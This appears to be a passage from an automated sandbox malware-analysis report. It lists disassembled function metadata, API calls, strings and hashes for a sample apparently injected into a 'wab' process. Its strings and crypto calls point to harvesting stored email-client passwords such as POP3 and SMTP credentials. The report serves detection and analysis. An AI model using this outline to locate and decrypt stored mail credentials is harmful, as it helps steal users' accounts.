                    • Opcode ID: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                    • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                    • Opcode Fuzzy Hash: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                    • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB
                    Function 0040BA28 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 441 40ba28-40ba3a 442 40ba87-40ba9b call 406c62 441->442 443 40ba3c-40ba52 call 407e20 _mbsicmp 441->443 465 40ba9d call 4107f1 442->465 466 40ba9d call 404734 442->466 467 40ba9d call 404785 442->467 468 40ba9d call 403c16 442->468 469 40ba9d call 410a9c 442->469 448 40ba54-40ba6d call 407e20 443->448 449 40ba7b-40ba85 443->449 454 40ba74 448->454 455 40ba6f-40ba72 448->455 449->442 449->443 450 40baa0-40bab3 call 407e30 458 40bab5-40bac1 450->458 459 40bafa-40bb09 SetCursor 450->459 457 40ba75-40ba76 call 40b5e5 454->457 455->457 457->449 461 40bac3-40bace 458->461 462 40bad8-40baf7 qsort 458->462 461->462 462->459 465->450 466->450 467->450 468->450 469->450
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: Cursor_mbsicmpqsort
                    • String ID: /nosort$/sort
                    • API String ID: 882979914-1578091866
                    • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                    • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                    • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                    • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                    Function 00410DBB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74registryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                      • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                    • memset.MSVCRT ref: 00410E10
                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                    • _mbscpy.MSVCRT ref: 00410E87
                      • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                    Strings
                    • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                    • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                    • API String ID: 889583718-2036018995
                    • Opcode ID: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                    • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                    • Opcode Fuzzy Hash: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                    • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                    Function 00410C68 Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                    Download Yara Rule
                    APIs
                    • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                    • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                    • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                    • LockResource.KERNEL32(00000000), ref: 00410CA1
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: Resource$FindLoadLockSizeof
                    • String ID:
                    • API String ID: 3473537107-0
                    • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                    • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                    • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                    • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                    Function 004109CF Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 004109F7
                      • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                      • Part of subcall function 004075CD: memcpy.MSVCRT ref: 00407618
                    • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                    • memset.MSVCRT ref: 00410A32
                    • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: PrivateProfileStringmemset$Writememcpysprintf
                    • String ID:
                    • API String ID: 3143880245-0
                    • Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                    • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                    • Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                    • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                    Function 00408D34 Relevance: 5.0, APIs: 4, Instructions: 36COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??2@
                    • String ID:
                    • API String ID: 1033339047-0
                    • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                    • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                    • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                    • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                    Function 00406F30 Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@mallocmemcpy
                    • String ID:
                    • API String ID: 3831604043-0
                    • Opcode ID: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                    • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                    • Opcode Fuzzy Hash: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                    • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                    Function 00407088 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                      • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                    • CreateFontIndirectA.GDI32(?), ref: 004070A6
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: CreateFontIndirect_mbscpymemset
                    • String ID: Arial
                    • API String ID: 3853255127-493054409
                    • Opcode ID: a9edf0add2530cae1e73dc887b0500a6e6731c557fb9a9d8b72d1c15ab1f178d
                    • Instruction ID: 3e85f73e1de40fb669f60d67ce34a2ecc2b5129f84855d11383e820b071861b9
                    • Opcode Fuzzy Hash: a9edf0add2530cae1e73dc887b0500a6e6731c557fb9a9d8b72d1c15ab1f178d
                    • Instruction Fuzzy Hash: FDD0C9A0E4020D67D710F7A0FD47F49776C5B00604F510831B905F10E1EAA4A1184A99
                    Function 0044B3CF Relevance: 3.1, APIs: 2, Instructions: 100COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: ProtectVirtual
                    • String ID:
                    • API String ID: 544645111-0
                    • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                    • Instruction ID: 9d5022db8ba3b04779ac2e9664088e7462d9cf1087a2f4409b49694314ac1291
                    • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                    • Instruction Fuzzy Hash: FB21F7114496816FFB218BB84C017B67BD8DB13364F19469BE184CB243D76CD85693FA
                    Function 0040CE70 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                    • _strcmpi.MSVCRT ref: 0040CEC3
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: strlen$_strcmpimemset
                    • String ID: /stext
                    • API String ID: 520177685-3817206916
                    • Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                    • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                    • Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                    • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                    Function 0044B40E Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: ProtectVirtual
                    • String ID:
                    • API String ID: 544645111-0
                    • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                    • Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
                    • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                    • Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE
                    Function 0044B42B Relevance: 3.1, APIs: 2, Instructions: 54memoryCOMMON
                    Download Yara Rule
                    APIs
                    • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                    • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: ProtectVirtual
                    • String ID:
                    • API String ID: 544645111-0
                    • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                    • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                    • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                    • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
                    Function 00404734 Relevance: 3.0, APIs: 2, Instructions: 24libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                    • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                    • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: Library$AddressFreeLoadProc
                    • String ID:
                    • API String ID: 145871493-0
                    • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                    • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                    • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                    • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                    Function 00410A6B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                    Download Yara Rule
                    APIs
                    • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                      • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                      • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                      • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: PrivateProfile$StringWrite_itoamemset
                    • String ID:
                    • API String ID: 4165544737-0
                    • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                    • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                    • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                    • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                    Function 00404785 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                    Download Yara Rule
                    APIs
                    • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: FreeLibrary
                    • String ID:
                    • API String ID: 3664257935-0
                    • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                    • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                    • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                    • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                    Function 00406D1A Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                    Download Yara Rule
                    APIs
                    • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                    • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                    • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                    • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                    Function 004107F1 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                    Download Yara Rule
                    APIs
                    • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: FreeLibrary
                    • String ID:
                    • API String ID: 3664257935-0
                    • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                    • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                    • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                    • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                    Function 00410CF3 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                    Download Yara Rule
                    APIs
                    • EnumResourceNamesA.KERNEL32(?,?,Function_00010C68,00000000), ref: 00410D02
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: EnumNamesResource
                    • String ID:
                    • API String ID: 3334572018-0
                    • Opcode ID: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                    • Instruction ID: 5afcab74deb5f1f746bbc86617496166ce7982b7e139a3a4a0d32d3f52cd2e16
                    • Opcode Fuzzy Hash: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                    • Instruction Fuzzy Hash: 05C09B3119534197C7519F108C4DF1B7695BB59706F144D297191940A4D7514054DE05
                    Function 00407F90 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                    Download Yara Rule
                    APIs
                    • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: CloseFind
                    • String ID:
                    • API String ID: 1863332320-0
                    • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                    • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                    • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                    • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                    Function 00410A9C Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                    Download Yara Rule
                    APIs
                    • RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                    • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                    • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                    • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                    Function 00406F81 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                    Download Yara Rule
                    APIs
                    • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: AttributesFile
                    • String ID:
                    • API String ID: 3188754299-0
                    • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                    • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                    • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                    • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00

                    Non-executed Functions

                    Function 004047CB Relevance: 38.5, APIs: 11, Strings: 11, Instructions: 49libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A70,?,00404986,?,?,00000000,?,00000000,?), ref: 004047DA
                    • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
                    • GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
                    • GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
                    • GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
                    • GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
                    • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
                    • GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
                    • GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
                    • GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
                    • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressProc$LibraryLoad
                    • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                    • API String ID: 2238633743-192783356
                    • Opcode ID: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                    • Instruction ID: 70faa285c49fb169990c8fbe2f493e995bb0ef80ad344915aa685f594b7479e2
                    • Opcode Fuzzy Hash: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                    • Instruction Fuzzy Hash: 1101C978E40744AEDB316F76CC09E06BEE1EF9C7047214D2EE1C153650D77AA011DE48
                    Function 004033F0 Relevance: 7.6, Strings: 6, Instructions: 61COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: PrivateProfileString_mbscmpstrlen
                    • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                    • API String ID: 3963849919-1658304561
                    • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                    • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                    • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                    • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                    Function 004016FD Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??2@??3@memcpymemset
                    • String ID: (yE$(yE$(yE
                    • API String ID: 1865533344-362086290
                    • Opcode ID: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                    • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
                    • Opcode Fuzzy Hash: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                    • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                    Function 0040E501 Relevance: 54.6, APIs: 21, Strings: 10, Instructions: 314COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                      • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                      • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                      • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                      • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                      • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                    • memset.MSVCRT ref: 0040E5B8
                    • memset.MSVCRT ref: 0040E5CD
                    • _mbscpy.MSVCRT ref: 0040E634
                    • _mbscpy.MSVCRT ref: 0040E64A
                    • _mbscpy.MSVCRT ref: 0040E660
                    • _mbscpy.MSVCRT ref: 0040E676
                    • _mbscpy.MSVCRT ref: 0040E68C
                    • _mbscpy.MSVCRT ref: 0040E69F
                    • memset.MSVCRT ref: 0040E6B5
                    • memset.MSVCRT ref: 0040E6CC
                      • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                      • Part of subcall function 004066A3: memcmp.MSVCRT ref: 004066EE
                    • memset.MSVCRT ref: 0040E736
                    • memset.MSVCRT ref: 0040E74F
                    • sprintf.MSVCRT ref: 0040E76D
                    • sprintf.MSVCRT ref: 0040E788
                    • _strcmpi.MSVCRT ref: 0040E79E
                    • _strcmpi.MSVCRT ref: 0040E7B7
                    • _strcmpi.MSVCRT ref: 0040E7D3
                    • memset.MSVCRT ref: 0040E858
                    • sprintf.MSVCRT ref: 0040E873
                    • _strcmpi.MSVCRT ref: 0040E889
                    • _strcmpi.MSVCRT ref: 0040E8A5
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
